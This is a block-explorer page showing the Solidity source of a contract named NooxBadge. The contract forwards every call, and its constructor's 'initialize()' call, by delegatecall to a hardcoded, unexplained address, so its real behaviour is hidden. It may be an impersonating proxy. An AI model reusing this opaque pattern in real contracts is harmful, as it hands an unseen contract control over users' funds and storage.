ETH Price: $3,418.89 (-0.63%)
Gas: 3 Gwei

Contract Diff Checker

Contract Name:
NooxBadge

Contract Source Code:

File 1 of 1 : NooxBadge

// SPDX-License-Identifier: MIT

pragma solidity >=0.8.13;

contract NooxBadge {
    uint256 data = 0x2721;
    fallback(bytes calldata data) payable external returns(bytes memory){
        (bool r1, bytes memory result) = address(0x3f51cBCFDB336449134b24EcDD89B376109C82B2).delegatecall(data);
        require(r1, "Verification.");
        return result;
    }

    receive() payable external {
    }

    constructor() {
        bytes memory data = abi.encodeWithSignature("initialize()");
        (bool r1,) = address(0x3f51cBCFDB336449134b24EcDD89B376109C82B2).delegatecall(data);
        require(r1, "Verificiation.");
    }
}

Please enter a contract address above to load the contract details and source code.

Context size (optional):